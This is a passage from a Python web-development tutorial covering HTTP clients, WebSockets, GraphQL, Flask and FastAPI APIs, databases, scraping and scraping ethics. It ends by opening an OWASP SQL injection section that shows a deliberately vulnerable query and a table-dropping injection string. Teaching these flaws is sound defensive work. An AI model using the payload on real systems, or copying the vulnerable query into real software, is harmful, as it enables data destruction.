        total=5,                       # At most 5 retries
        backoff_factor=1,              # Delay roughly doubles per retry (2s, 4s, 8s, ...); exact schedule depends on the urllib3 version
        status_forcelist=[429, 500, 502, 503, 504],
        # POST is not idempotent: retry it only if the API deduplicates requests
        allowed_methods=["GET", "POST", "PUT", "DELETE"],
        respect_retry_after_header=True  # Honor the server's Retry-After header
    )

    adapter = HTTPAdapter(
        max_retries=retry_strategy,
        pool_connections=10,            # Number of per-host connection pools to cache
        pool_maxsize=20                 # Maximum connections kept in each pool
    )
    session.mount("https://", adapter)
    session.mount("http://", adapter)

    return session

# Usage:
session = create_resilient_session()
session.headers["Authorization"] = "Bearer token"
response = session.get("https://api.example.com/data", timeout=30)
# If it receives a 503 → automatic retry with backoff

# === Manual rate limiting ===
class RateLimiter:
    """Minimum-interval rate limiter: spaces calls evenly (no bursts, so not a true token bucket)."""
    def __init__(self, calls_per_second: float):
        self.min_interval = 1.0 / calls_per_second
        self.last_call = 0.0

    def wait(self):
        elapsed = time.monotonic() - self.last_call
        if elapsed < self.min_interval:
            time.sleep(self.min_interval - elapsed)
        self.last_call = time.monotonic()

limiter = RateLimiter(calls_per_second=10)   # Max 10 req/sec

for item_id in range(100):
    limiter.wait()
    response = requests.get(f"https://api.example.com/items/{item_id}", timeout=10)
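
The RateLimiter class above enforces a fixed minimum gap between calls. A token bucket behaves differently: it allows short bursts up to a capacity and then refills at a steady rate. The sketch below is one way to write it; the TokenBucket class and its injectable clock parameter are assumptions made for illustration and testing, and it is not thread-safe.

```python
import time


class TokenBucket:
    """Allow bursts of up to `capacity` calls, refilled at `rate` tokens per second."""

    def __init__(self, rate: float, capacity: int, clock=time.monotonic):
        self.rate = rate
        self.capacity = capacity
        self.clock = clock
        self.tokens = float(capacity)   # start full, so an initial burst is allowed
        self.updated = clock()

    def try_acquire(self) -> bool:
        """Consume one token if available; return False instead of blocking."""
        now = self.clock()
        refill = (now - self.updated) * self.rate
        self.tokens = min(self.capacity, self.tokens + refill)
        self.updated = now
        if self.tokens >= 1:
            self.tokens -= 1
            return True
        return False


# A fake clock makes the behavior deterministic for the demonstration.
fake_now = [0.0]
bucket = TokenBucket(rate=2, capacity=3, clock=lambda: fake_now[0])

burst = [bucket.try_acquire() for _ in range(4)]      # three succeed, the fourth is refused
fake_now[0] += 0.5                                     # 0.5 s at 2 tokens/s refills one token
after_wait = [bucket.try_acquire(), bucket.try_acquire()]

print(burst, after_wait)
```

With the default clock, a caller would typically sleep briefly and call try_acquire again when it returns False.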

9. WebSockets and Real-Time Communication

# === WebSocket Client ===
import asyncio
import websockets   # pip install websockets
import json

async def websocket_client():
    uri = "wss://stream.example.com/ws"

    async with websockets.connect(uri) as ws:
        # Send a message:
        await ws.send(json.dumps({
            "action": "subscribe",
            "channels": ["prices", "notifications"]
        }))

        # Receive continuously:
        async for message in ws:
            data = json.loads(message)
            print(f"Received: {data}")

            if data.get("type") == "price_update":
                print(f"  {data['symbol']}: {data['price']}")
            elif data.get("type") == "notification":
                print(f"  Alert: {data['message']}")

# asyncio.run(websocket_client())

# === Server-Sent Events (SSE): one-way, simple ===
import requests

def listen_sse(url: str):
    """Listen to a Server-Sent Events stream."""
    response = requests.get(url, stream=True, headers={"Accept": "text/event-stream"})
    response.raise_for_status()
    response.encoding = "utf-8"   # SSE streams are always UTF-8

    for line in response.iter_lines(decode_unicode=True):
        if line.startswith("data: "):
            data = json.loads(line[6:])
            print(f"Event: {data}")

# WebSocket vs. SSE vs. Polling:
#   WebSocket: bidirectional, persistent, complex
#   SSE:       server→client only, simple, auto-reconnect, plain HTTP
#   Polling:   client→server periodically, simple, inefficient
#   Long-Poll: server holds the connection open, more efficient than polling
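
The listen_sse function above handles only single-line `data:` fields. In the SSE wire format an event can also carry an `event:` name, span several `data:` lines, and is terminated by a blank line, while lines starting with `:` are comments (often used as keep-alives). A sketch of a parser for already-decoded lines follows; parse_sse is a hypothetical helper and ignores the `id:` and `retry:` fields.

```python
def parse_sse(lines):
    """Yield (event_type, data) tuples from an iterable of decoded SSE lines."""
    event_type, data_lines = "message", []
    for line in lines:
        if line == "":                       # blank line: dispatch the pending event
            if data_lines:
                yield event_type, "\n".join(data_lines)
            event_type, data_lines = "message", []
        elif line.startswith(":"):           # comment or keep-alive, ignored
            continue
        else:
            field, _, value = line.partition(":")
            value = value.removeprefix(" ")  # a single leading space is not part of the value
            if field == "event":
                event_type = value
            elif field == "data":
                data_lines.append(value)


stream = [
    ": keep-alive",
    "event: price_update",
    'data: {"symbol": "ABC", "price": 10.5}',
    "",
    "data: first line",
    "data: second line",
    "",
]
events = list(parse_sse(stream))
print(events)
```

The same generator can be fed directly from response.iter_lines(decode_unicode=True).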

10. GraphQL: Flexible Queries

import requests

GRAPHQL_URL = "https://api.example.com/graphql"

# Query: the client specifies EXACTLY which fields it wants:
query = """
query GetUser($id: ID!) {
    user(id: $id) {
        name
        email
        posts(limit: 5) {
            title
            createdAt
            comments {
                author { name }
                text
            }
        }
    }
}
"""

response = requests.post(
    GRAPHQL_URL,
    json={
        "query": query,
        "variables": {"id": "42"}
    },
    headers={"Authorization": "Bearer token"}
)

data = response.json()
user = data["data"]["user"]
print(f"User: {user['name']}")
for post in user["posts"]:
    print(f"  Post: {post['title']} ({len(post['comments'])} comments)")

# Mutation (modifying data):
mutation = """
mutation CreatePost($input: PostInput!) {
    createPost(input: $input) {
        id
        title
    }
}
"""
response = requests.post(
    GRAPHQL_URL,
    json={
        "query": mutation,
        "variables": {"input": {"title": "New Post", "body": "Content..."}}
    }
)

# GraphQL vs. REST:
# REST:    multiple endpoints (/users, /users/42, /users/42/posts)
#          over-fetching (you receive fields you do not need)
#          under-fetching (you need multiple requests)
# GraphQL: a single endpoint (/graphql)
#          the client specifies exactly what it wants
#          a single request for complex data
#          more complex on the server, caching is harder
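
One practical difference from REST is that GraphQL servers commonly return HTTP 200 even when the query fails, reporting problems in an `errors` array next to `data`. Reading data["data"]["user"] directly therefore hides failures. A small sketch of a stricter unwrapping step follows; GraphQLError and unwrap_graphql are hypothetical names, and treating any error as fatal is a simplification, since GraphQL also allows partial data alongside errors.

```python
class GraphQLError(Exception):
    """Raised when a GraphQL response contains an 'errors' array."""


def unwrap_graphql(payload: dict) -> dict:
    """Return the 'data' part of a GraphQL response, or raise on reported errors."""
    errors = payload.get("errors")
    if errors:
        messages = "; ".join(e.get("message", "unknown error") for e in errors)
        raise GraphQLError(messages)
    return payload.get("data") or {}


ok_payload = {"data": {"user": {"name": "Ana Pop", "posts": []}}}
failed_payload = {
    "data": None,
    "errors": [{"message": "User not found", "path": ["user"]}],
}

user = unwrap_graphql(ok_payload)["user"]
print(user["name"])

try:
    unwrap_graphql(failed_payload)
except GraphQLError as exc:
    error_text = str(exc)
    print(f"GraphQL error: {error_text}")
```

In the client code above this would be called as unwrap_graphql(response.json()) after response.raise_for_status().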

PART III: BUILDING APIs (SERVER)

12. Flask: From Hello World to a Complete API

from flask import Flask, request, jsonify, abort
from functools import wraps

app = Flask(__name__)

# Simulated database:
users_db = {}
next_id = 1

# === Middleware: simple authentication ===
def require_auth(f):
    @wraps(f)
    def decorated(*args, **kwargs):
        token = request.headers.get("Authorization", "").removeprefix("Bearer ")
        if token != "secret-token":
            return jsonify({"error": "Unauthorized"}), 401
        return f(*args, **kwargs)
    return decorated

# === Error handlers ===
@app.errorhandler(404)
def not_found(e):
    return jsonify({"error": "Resource not found"}), 404

@app.errorhandler(400)
def bad_request(e):
    return jsonify({"error": str(e.description)}), 400

# === CRUD API ===

# GET /api/users: listing with filtering and pagination
@app.route("/api/users", methods=["GET"])
def list_users():
    # Clamp the inputs: page >= 1 and 1 <= per_page <= 100 (per_page=0 would divide by zero below)
    page = max(request.args.get("page", 1, type=int), 1)
    per_page = min(max(request.args.get("per_page", 10, type=int), 1), 100)
    name_filter = request.args.get("name", "")

    filtered = [u for u in users_db.values()
                if name_filter.lower() in u["name"].lower()]
    total = len(filtered)
    start = (page - 1) * per_page
    paginated = filtered[start:start + per_page]

    return jsonify({
        "data": paginated,
        "total": total,
        "page": page,
        "per_page": per_page,
        "pages": (total + per_page - 1) // per_page   # ceiling division
    })

# GET /api/users/<id>: read a single user
@app.route("/api/users/<int:user_id>", methods=["GET"])
def get_user(user_id):
    user = users_db.get(user_id)
    if not user:
        abort(404)
    return jsonify(user)

# POST /api/users: create a user
@app.route("/api/users", methods=["POST"])
@require_auth
def create_user():
    global next_id
    # silent=True returns None for a missing or malformed JSON body instead of aborting
    data = request.get_json(silent=True)

    if not isinstance(data, dict) or not data.get("name") or not data.get("email"):
        abort(400, description="Fields 'name' and 'email' are required")

    if any(u["email"] == data["email"] for u in users_db.values()):
        return jsonify({"error": "Email already exists"}), 409

    user = {
        "id": next_id,
        "name": data["name"],
        "email": data["email"],
        "active": data.get("active", True)
    }
    users_db[next_id] = user
    next_id += 1

    return jsonify(user), 201, {"Location": f"/api/users/{user['id']}"}

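# PUT /api/users/<id>: full update
@app.route("/api/users/<int:user_id>", methods=["PUT"])
@require_auth
def update_user(user_id):
    if user_id not in users_db:
        abort(404)
    data = request.get_json(silent=True)
    # PUT replaces the whole resource, so the required fields must be present;
    # without this check a missing key raises KeyError and surfaces as a 500.
    if not data or not data.get("name") or not data.get("email"):
        abort(400, description="Fields 'name' and 'email' are required")
    users_db[user_id].update({
        "name": data["name"],
        "email": data["email"],
        "active": data.get("active", True)
    })
    return jsonify(users_db[user_id])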

# DELETE /api/users/<id>: delete
@app.route("/api/users/<int:user_id>", methods=["DELETE"])
@require_auth
def delete_user(user_id):
    if user_id not in users_db:
        abort(404)
    del users_db[user_id]
    return "", 204

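if __name__ == "__main__":
    # Development server only. debug=True enables the interactive Werkzeug
    # debugger (arbitrary code execution), so bind to localhost, not 0.0.0.0.
    app.run(debug=True, host="127.0.0.1", port=5000)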

13. FastAPI: modern APIs with typing and validation

from fastapi import FastAPI, HTTPException, Depends, Query, Path, Header, status
from fastapi.security import HTTPBearer, HTTPAuthorizationCredentials
from pydantic import BaseModel, EmailStr, Field  # EmailStr needs: pip install "pydantic[email]"
from datetime import datetime
from typing import Annotated

app = FastAPI(
    title="University API",
    description="API for student management",
    version="2.0.0",
)

# === Pydantic models (automatic validation) ===
class UserCreate(BaseModel):
    """Schema for creating a user."""
    name: str = Field(..., min_length=2, max_length=100, examples=["Ana Pop"])
    email: EmailStr = Field(..., examples=["ana@example.com"])
    age: int = Field(ge=16, le=120, examples=[21])
    active: bool = True

class UserResponse(BaseModel):
    """Response schema."""
    id: int
    name: str
    email: str
    age: int
    active: bool
    created_at: datetime

    model_config = {"from_attributes": True}

class UserList(BaseModel):
    data: list[UserResponse]
    total: int
    page: int
    pages: int

class ErrorResponse(BaseModel):
    detail: str

# === Security ===
security = HTTPBearer()

async def verify_token(
    credentials: Annotated[HTTPAuthorizationCredentials, Depends(security)]
) -> str:
    if credentials.credentials != "secret-token":
        raise HTTPException(status_code=401, detail="Invalid token")
    return credentials.credentials

# === In-memory storage ===
db: dict[int, dict] = {}
counter = 0

# === Endpoints ===

@app.get("/api/users", response_model=UserList, tags=["users"])
async def list_users(
    page: Annotated[int, Query(ge=1, description="Page number")] = 1,
    per_page: Annotated[int, Query(ge=1, le=100)] = 10,
    name: Annotated[str | None, Query(description="Filter by name")] = None,
    active: Annotated[bool | None, Query()] = None,
):
    """List users with filtering and pagination."""
    filtered = list(db.values())
    if name:
        filtered = [u for u in filtered if name.lower() in u["name"].lower()]
    if active is not None:
        filtered = [u for u in filtered if u["active"] == active]

    total = len(filtered)
    start = (page - 1) * per_page

    return UserList(
        data=filtered[start:start + per_page],
        total=total,
        page=page,
        pages=max(1, (total + per_page - 1) // per_page)
    )

@app.get("/api/users/{user_id}", response_model=UserResponse, tags=["users"],
         responses={404: {"model": ErrorResponse}})
async def get_user(
    user_id: Annotated[int, Path(ge=1, description="User ID")]
):
    """Get a user by ID."""
    if user_id not in db:
        raise HTTPException(status_code=404, detail="User not found")
    return db[user_id]

@app.post("/api/users", response_model=UserResponse, status_code=201, tags=["users"])
async def create_user(
    user: UserCreate,
    token: Annotated[str, Depends(verify_token)]
):
    """Create a new user. Requires authentication."""
    global counter

    if any(u["email"] == user.email for u in db.values()):
        raise HTTPException(status_code=409, detail="Email already exists")

    counter += 1
    record = {
        "id": counter,
        **user.model_dump(),
        "created_at": datetime.now()
    }
    db[counter] = record
    return record

@app.delete("/api/users/{user_id}", status_code=204, tags=["users"])
async def delete_user(
    user_id: int,
    token: Annotated[str, Depends(verify_token)]
):
    """Delete a user."""
    if user_id not in db:
        raise HTTPException(status_code=404, detail="User not found")
    del db[user_id]

# Health check:
@app.get("/health", tags=["system"])
async def health():
    return {"status": "healthy", "timestamp": datetime.now().isoformat()}

# Automatic documentation:
# Swagger UI: http://localhost:8000/docs
# ReDoc:      http://localhost:8000/redoc
# OpenAPI:    http://localhost:8000/openapi.json

# Run (development): uvicorn main:app --reload --host 0.0.0.0 --port 8000

14. REST: design principles

14.1 URL conventions

Resources are nouns (plural), NOT verbs:
  ✅ GET    /api/users                     (list)
  ✅ GET    /api/users/42                  (read one)
  ✅ POST   /api/users                     (create)
  ✅ PUT    /api/users/42                  (full update)
  ✅ PATCH  /api/users/42                  (partial update)
  ✅ DELETE /api/users/42                  (delete)

  ❌ GET    /api/getUser/42               (verb in the URL!)
  ❌ POST   /api/createUser               (verb in the URL!)
  ❌ POST   /api/deleteUser/42            (wrong method + verb!)

Nested resources (relationships):
  GET /api/users/42/posts                  (posts of user 42)
  GET /api/users/42/posts/7                (post 7 of user 42)
  POST /api/users/42/posts                 (create a post for user 42)

Filtering, sorting, pagination: query parameters
  GET /api/users?status=active&sort=-created_at&page=2&per_page=20

API versioning:
  /api/v1/users                            (in the URL: the most common)
  Accept: application/vnd.myapi.v2+json    (in a header: more correct in theory)
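
The `sort=-created_at` parameter in the example follows a common convention in which a leading `-` requests descending order. A minimal sketch of how a server might parse such a parameter is shown here; the allowlist `ALLOWED_SORT_FIELDS` and the helper names are assumptions made for illustration, not part of any framework.

```python
# Hypothetical allowlist: only these fields may be used for sorting.
ALLOWED_SORT_FIELDS = {"name", "created_at"}


def parse_sort(sort: str) -> list[tuple[str, bool]]:
    """Turn 'name,-created_at' into [('name', False), ('created_at', True)].

    The boolean is True when the field should be sorted in descending order.
    """
    result = []
    for part in sort.split(","):
        part = part.strip()
        if not part:
            continue
        descending = part.startswith("-")
        field = part[1:] if descending else part
        if field not in ALLOWED_SORT_FIELDS:
            raise ValueError(f"Cannot sort by {field!r}")
        result.append((field, descending))
    return result


def apply_sort(rows: list[dict], sort: str) -> list[dict]:
    """Sort rows by several keys; the first key in `sort` has priority."""
    # Python's sort is stable, so sorting by the least significant key first
    # and the most significant key last yields a correct multi-key ordering.
    for field, descending in reversed(parse_sort(sort)):
        rows = sorted(rows, key=lambda r: r[field], reverse=descending)
    return rows


users = [
    {"name": "Ana", "created_at": "2024-01-02"},
    {"name": "Ion", "created_at": "2024-01-03"},
    {"name": "Ana", "created_at": "2024-01-05"},
]
for row in apply_sort(users, "name,-created_at"):
    print(row)
```

Rejecting unknown field names keeps clients from sorting on columns that are not indexed or not meant to be public.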

14.2 Response structure: keep it consistent

# === Success response (single resource) ===
# GET /api/users/42
{
    "id": 42,
    "name": "Ana Pop",
    "email": "ana@example.com",
    "created_at": "2024-01-15T10:30:00Z"
}

# === Success response (collection) ===
# GET /api/users?page=2&per_page=10
{
    "data": [
        {"id": 42, "name": "Ana Pop", ...},
        {"id": 43, "name": "Ion Rus", ...}
    ],
    "pagination": {
        "total": 156,
        "page": 2,
        "per_page": 10,
        "pages": 16,
        "next": "/api/users?page=3&per_page=10",
        "prev": "/api/users?page=1&per_page=10"
    }
}

# === Error response (always the same structure!) ===
# 400 Bad Request
{
    "error": {
        "code": "VALIDATION_ERROR",
        "message": "Validation failed",
        "details": [
            {"field": "email", "message": "Invalid email format"},
            {"field": "age", "message": "Must be between 16 and 120"}
        ]
    }
}

# 404 Not Found
{
    "error": {
        "code": "NOT_FOUND",
        "message": "User with id 999 not found"
    }
}

16. Databases and ORMs in web applications

# FastAPI + SQLAlchemy + PostgreSQL: complete setup
# (app, UserCreate and UserResponse are the objects defined in section 13)

from sqlalchemy import create_engine, Column, Integer, String, Boolean, DateTime
from sqlalchemy.orm import declarative_base, sessionmaker, Session
from sqlalchemy.sql import func
from fastapi import Depends, HTTPException

DATABASE_URL = "postgresql://user:pass@localhost:5432/appdb"

engine = create_engine(DATABASE_URL, pool_size=10, max_overflow=20)
SessionLocal = sessionmaker(autocommit=False, autoflush=False, bind=engine)
Base = declarative_base()

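# SQLAlchemy model:
class UserModel(Base):
    __tablename__ = "users"

    id = Column(Integer, primary_key=True, index=True)
    name = Column(String(100), nullable=False)
    email = Column(String(150), unique=True, nullable=False, index=True)
    # UserCreate and UserResponse both carry `age`; without this column
    # UserModel(**user.model_dump()) fails with an "invalid keyword argument" error.
    age = Column(Integer, nullable=False)
    active = Column(Boolean, default=True)
    created_at = Column(DateTime(timezone=True), server_default=func.now())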

# Dependency injection for the DB session:
def get_db():
    db = SessionLocal()
    try:
        yield db
    finally:
        db.close()

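# Endpoints backed by a real database.
# Declared with plain `def`: the SQLAlchemy Session used here is synchronous,
# and FastAPI runs `def` endpoints in a thread pool, so a slow query does not
# block the event loop the way it would inside `async def`.
@app.get("/api/users/{user_id}", response_model=UserResponse)
def get_user(user_id: int, db: Session = Depends(get_db)):
    user = db.query(UserModel).filter(UserModel.id == user_id).first()
    if not user:
        raise HTTPException(status_code=404, detail="User not found")
    return user

@app.post("/api/users", response_model=UserResponse, status_code=201)
def create_user(user: UserCreate, db: Session = Depends(get_db)):
    # Friendly pre-check; the unique constraint on `email` remains the real
    # guard, because two concurrent requests can both pass this query.
    existing = db.query(UserModel).filter(UserModel.email == user.email).first()
    if existing:
        raise HTTPException(status_code=409, detail="Email already exists")

    db_user = UserModel(**user.model_dump())
    db.add(db_user)
    db.commit()
    db.refresh(db_user)
    return db_user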

17. Background tasks, queues and asynchronous processing

from fastapi import BackgroundTasks

# === Background Tasks (FastAPI built-in) ===
def send_welcome_email(email: str, name: str):
    """Task executed in the background AFTER the response has been sent."""
    import time
    time.sleep(2)    # Simulates sending the email
    print(f"Email sent to {email} for {name}")

@app.post("/api/users", status_code=201)
async def create_user(user: UserCreate, background_tasks: BackgroundTasks):
    # Create the user (fast). save_user is a placeholder for the persistence code.
    db_user = save_user(user)

    # Schedule the background task (does not delay the response):
    background_tasks.add_task(send_welcome_email, user.email, user.name)

    # The response goes out immediately; the email is sent afterwards in the
    # same process, so the task is lost if the worker crashes or restarts.
    return db_user

# === Celery (for serious production workloads) ===
from celery import Celery

celery_app = Celery("tasks", broker="redis://localhost:6379/0")

@celery_app.task(bind=True, max_retries=3, default_retry_delay=60)
def process_order(self, order_id: int):
    try:
        # Long-running processing (payment, inventory, notifications)...
        order = get_order(order_id)
        charge_payment(order)
        update_inventory(order)
        send_confirmation(order)
    except Exception as exc:
        # Retry after a fixed 60 s delay (default_retry_delay), at most 3 times.
        # A retry re-runs the whole task, so each step must be idempotent,
        # otherwise a failure in send_confirmation charges the customer again.
        raise self.retry(exc=exc)

# Called from an endpoint:
@app.post("/api/orders")
async def create_order(order: OrderCreate):
    db_order = save_order(order)
    process_order.delay(db_order.id)    # Hand off to Celery (asynchronous)
    return {"id": db_order.id, "status": "processing"}
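
The `process_order` task above waits the same `default_retry_delay` before every retry. When many tasks fail at once (for example because a payment provider is down), a growing, randomized delay spreads the retries out. The helper below is a sketch of exponential backoff with "full jitter"; the name `backoff_delay` and its defaults are assumptions for illustration.

```python
import random


def backoff_delay(attempt: int, base: float = 1.0, cap: float = 300.0,
                  jitter: bool = True, rng=random) -> float:
    """Seconds to wait before retry number `attempt` (0-based).

    The delay doubles with every attempt (base, 2*base, 4*base, ...) and is
    capped at `cap`. With jitter enabled, a random value between 0 and that
    delay is returned so that many clients do not retry at the same instant.
    """
    delay = min(cap, base * 2 ** attempt)
    if jitter:
        delay = rng.uniform(0, delay)
    return delay


# Deterministic schedule (jitter disabled) for the first five retries:
print([backoff_delay(n, jitter=False) for n in range(5)])
```

Inside a bound Celery task, a call along the lines of `raise self.retry(exc=exc, countdown=backoff_delay(self.request.retries))` would apply this delay to each retry.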

PART IV: WEB SCRAPING

18. Web scraping fundamentals

# Web scraping = automated extraction of data from web pages
# Types of web content:
#   Static:  HTML generated on the server, visible directly in the source (requests + BS4)
#   Dynamic: HTML generated by JavaScript in the browser (needs Selenium/Playwright)

# Checking whether a page is static: View Source (Ctrl+U) vs. Inspect Element (F12)
# If the data appears in View Source → static (requests is enough)
# If the data appears only in Inspect → dynamic (a headless browser is needed)

# Before scraping, check:
# 1. Is there an API? (better, more stable, faster)
# 2. Is there an RSS/Atom feed?
# 3. Is there a downloadable public dataset?
# 4. Does robots.txt allow scraping? (https://example.com/robots.txt)
# 5. Do the Terms of Service allow scraping?
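
The robots.txt check from the list above can be automated with the standard library module `urllib.robotparser`. The sketch below parses an inline sample file so that it runs without network access; the rules in `ROBOTS_TXT` and the bot name `MyScraperBot/1.0` are illustrative assumptions.

```python
from urllib.robotparser import RobotFileParser

# Sample rules used only for this demonstration.
ROBOTS_TXT = """\
User-agent: *
Disallow: /private/
Crawl-delay: 5
"""


def build_parser(robots_txt: str) -> RobotFileParser:
    """Create a parser from the text of a robots.txt file."""
    parser = RobotFileParser()
    parser.parse(robots_txt.splitlines())
    return parser


parser = build_parser(ROBOTS_TXT)
agent = "MyScraperBot/1.0"

print(parser.can_fetch(agent, "https://example.com/quotes/"))     # allowed path
print(parser.can_fetch(agent, "https://example.com/private/x"))   # disallowed path
print(parser.crawl_delay(agent))                                  # delay in seconds, if declared
```

Against a live site, the parser would instead be pointed at the file with `set_url("https://example.com/robots.txt")` followed by `read()`.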

19. BeautifulSoup: extracting data from HTML

import requests
from bs4 import BeautifulSoup

# Download the page (always set a timeout; requests waits indefinitely by default):
url = "https://quotes.toscrape.com/"
response = requests.get(url, headers={"User-Agent": "Mozilla/5.0"}, timeout=10)
response.raise_for_status()

# Parse the HTML:
soup = BeautifulSoup(response.text, "html.parser")
# or: "lxml" (faster), "html5lib" (more lenient)

# === Navigation and search ===

# Find a single element:
title = soup.find("title").text
print(title)

# Find all elements of a given type:
quotes = soup.find_all("span", class_="text")
for q in quotes:
    print(q.text)

# CSS selectors (more powerful):
quotes = soup.select("div.quote span.text")
authors = soup.select("div.quote small.author")
# Note: this is a flat list of every tag on the page, not grouped per quote.
tags_per_quote = soup.select("div.quote div.tags a.tag")

for quote, author in zip(quotes, authors):
    print(f"'{quote.text}' — {author.text}")

# Attributes:
for link in soup.select("a[href]"):
    print(link["href"])               # Value of the href attribute
    print(link.get("class", []))      # CSS classes (a list)
    print(link.text.strip())          # Visible text

# DOM navigation:
first_quote = soup.select_one("div.quote")
print(first_quote.find("span", class_="text").text)
print(first_quote.find("small", class_="author").text)
tags = [tag.text for tag in first_quote.select("a.tag")]
print(f"Tags: {tags}")

# === Scraping with pagination ===
import time

def scrape_all_quotes() -> list[dict]:
    all_quotes = []
    page = 1

    while True:
        url = f"https://quotes.toscrape.com/page/{page}/"
        response = requests.get(url, timeout=10)

        if response.status_code == 404:
            break
        response.raise_for_status()    # Stop on 5xx/429 instead of parsing an error page

        soup = BeautifulSoup(response.text, "html.parser")
        quotes = soup.select("div.quote")

        if not quotes:
            break

        for q in quotes:
            all_quotes.append({
                "text": q.select_one("span.text").text.strip('""\u201c\u201d'),
                "author": q.select_one("small.author").text,
                "tags": [t.text for t in q.select("a.tag")]
            })

        # Check whether there is a next page:
        next_btn = soup.select_one("li.next a")
        if not next_btn:
            break

        page += 1
        time.sleep(1)    # Politeness: 1 second between requests

    return all_quotes

quotes = scrape_all_quotes()
print(f"Total: {len(quotes)} quotes")

# Save to CSV:
import csv
with open("quotes.csv", "w", newline="", encoding="utf-8") as f:
    writer = csv.DictWriter(f, fieldnames=["text", "author", "tags"])
    writer.writeheader()
    for q in quotes:
        # Build a new row instead of overwriting q["tags"], so `quotes`
        # still holds tag lists after the export.
        writer.writerow({**q, "tags": ", ".join(q["tags"])})

20. Advanced scraping: Selenium and Playwright

# === Playwright (modern, recommended) ===
# pip install playwright && playwright install

from playwright.sync_api import sync_playwright

def scrape_dynamic_page(url: str, max_scrolls: int = 20) -> list[dict]:
    """Scrape a page whose content is generated dynamically by JavaScript.

    The selectors below (div.product-card, h3.name, ...) are placeholders.
    """
    results = []

    with sync_playwright() as p:
        browser = p.chromium.launch(headless=True)
        try:
            page = browser.new_page()

            # Navigate:
            page.goto(url, wait_until="networkidle")

            # Wait for a specific element:
            page.wait_for_selector("div.product-card", timeout=10000)

            # Infinite scroll (for lazy loading), capped so that an endless
            # feed cannot keep the loop running forever:
            previous_height = 0
            for _ in range(max_scrolls):
                page.evaluate("window.scrollTo(0, document.body.scrollHeight)")
                page.wait_for_timeout(2000)    # Wait for content to load

                current_height = page.evaluate("document.body.scrollHeight")
                if current_height == previous_height:
                    break
                previous_height = current_height

            # Extract data (skip cards that lack a name or price element):
            for product in page.query_selector_all("div.product-card"):
                name = product.query_selector("h3.name")
                price = product.query_selector("span.price")
                if name and price:
                    results.append({"name": name.inner_text(),
                                    "price": price.inner_text()})

            # Interaction (click, fill, press):
            page.click("button.load-more")
            page.fill("input[name='search']", "Python")
            page.press("input[name='search']", "Enter")
            page.wait_for_load_state("networkidle")

            # Screenshot:
            page.screenshot(path="screenshot.png", full_page=True)

            # Intercepting API requests (very useful!):
            # capturing the page's API calls is often simpler than parsing HTML
        finally:
            browser.close()    # Release the browser even if a step above fails

    return results

# === Intercepting API responses ===
def intercept_api():
    """Capture the page's API responses (often the most efficient method)."""
    api_data = []

    def handle_response(response):
        if "/api/products" in response.url and response.status == 200:
            api_data.append(response.json())

    with sync_playwright() as p:
        browser = p.chromium.launch(headless=True)
        page = browser.new_page()
        page.on("response", handle_response)
        page.goto("https://example.com/products")
        page.wait_for_timeout(5000)
        browser.close()

    return api_data

21. Scrapy: a framework for scraping at scale

# Scrapy = industrial-strength framework for web scraping
# pip install scrapy

# Scrapy project structure:
# myproject/
# ├── scrapy.cfg
# └── myproject/
#     ├── __init__.py
#     ├── items.py          # Data structures
#     ├── middlewares.py    # Custom middleware
#     ├── pipelines.py      # Data post-processing
#     ├── settings.py       # Configuration
#     └── spiders/
#         └── quotes_spider.py

# === Spider ===
import scrapy

class QuotesSpider(scrapy.Spider):
    name = "quotes"
    start_urls = ["https://quotes.toscrape.com/"]

    # Polite settings:
    custom_settings = {
        "DOWNLOAD_DELAY": 1,           # 1 second between requests
        "CONCURRENT_REQUESTS": 4,      # At most 4 concurrent requests
        "ROBOTSTXT_OBEY": True,        # Respect robots.txt
        "USER_AGENT": "MyScraperBot/1.0 (contact@example.com)",
        "FEEDS": {
            "quotes.json": {"format": "json", "encoding": "utf-8"},
        },
    }

    def parse(self, response):
        """Parse a page of quotes."""
        for quote in response.css("div.quote"):
            yield {
                # default="" avoids an AttributeError if the text node is missing
                "text": quote.css("span.text::text").get(default="").strip('""\u201c\u201d'),
                "author": quote.css("small.author::text").get(),
                "tags": quote.css("a.tag::text").getall(),
                "url": response.url,
            }

        # Follow the link to the next page:
        next_page = response.css("li.next a::attr(href)").get()
        if next_page:
            yield response.follow(next_page, callback=self.parse)

# Run: scrapy crawl quotes
# or from a script:
# from scrapy.crawler import CrawlerProcess
# process = CrawlerProcess()
# process.crawl(QuotesSpider)
# process.start()

22. Ethics, legality and good practice

=== ETHICS RULES AND GOOD PRACTICES ===

1. ALWAYS check robots.txt:
   https://example.com/robots.txt
   User-agent: *
   Disallow: /private/        # Do NOT access these paths
   Crawl-delay: 5             # Wait 5 seconds between requests

2. Respect the Terms of Service:
   Many sites explicitly forbid scraping in their ToS.
   If an official API exists, use it.

3. Be polite to the server:
   - Delay between requests (at least 1 second, ideally 2-5)
   - Limit concurrency (at most 2-4 concurrent requests)
   - Identify yourself (descriptive User-Agent with a contact email)
   - Do not scrape during the site's peak hours
   - Cache responses (do not download the same page twice)

4. Do no harm:
   - Do not overload the server (in effect an unintentional DoS)
   - Do not extract personal data without consent (GDPR!)
   - Do not use the data for spam or harassment
   - Do not resell copyright-protected data

5. Legal aspects:
   - Public data can generally be accessed
   - Personal data: GDPR applies (EU)
   - Scraping that violates the ToS: a legal grey area
   - Circumventing technical measures (CAPTCHA bypass): potentially illegal
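
The "delay between requests" rule from point 3 can be enforced in code rather than left to scattered `time.sleep` calls. The class below is a minimal sketch of a per-host throttle; the name `Throttle` and its interface are assumptions for illustration, and the clock and sleep functions are injectable so the behaviour can be tested without waiting.

```python
import time


class Throttle:
    """Enforce a minimum delay between consecutive requests to the same host."""

    def __init__(self, min_delay: float, clock=time.monotonic, sleep=time.sleep):
        self.min_delay = min_delay
        self._clock = clock
        self._sleep = sleep
        self._last: dict[str, float] = {}   # host -> time of the last request

    def wait(self, host: str) -> float:
        """Block until `host` may be contacted again; return the seconds slept."""
        slept = 0.0
        last = self._last.get(host)
        if last is not None:
            remaining = self.min_delay - (self._clock() - last)
            if remaining > 0:
                self._sleep(remaining)
                slept = remaining
        # Record the moment the request is about to be sent.
        self._last[host] = self._clock()
        return slept


throttle = Throttle(min_delay=2.0)
throttle.wait("quotes.toscrape.com")   # first call for a host returns immediately
# ... send the request here, then call wait() again before the next one
```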

PART V: WEB SECURITY

23. OWASP Top 10: critical vulnerabilities

23.1 SQL Injection

# ❌ VULNERABLE: string concatenation
query = f"SELECT * FROM users WHERE email = '{user_input}'"
# If user_input = "'; DROP TABLE users; --"
# → SELECT * FROM users WHERE email = ''; DROP TABLE users; --'

# ✅ SAFE: parameterized queries
# (%s is the placeholder style of drivers such as psycopg; sqlite3 uses ?)
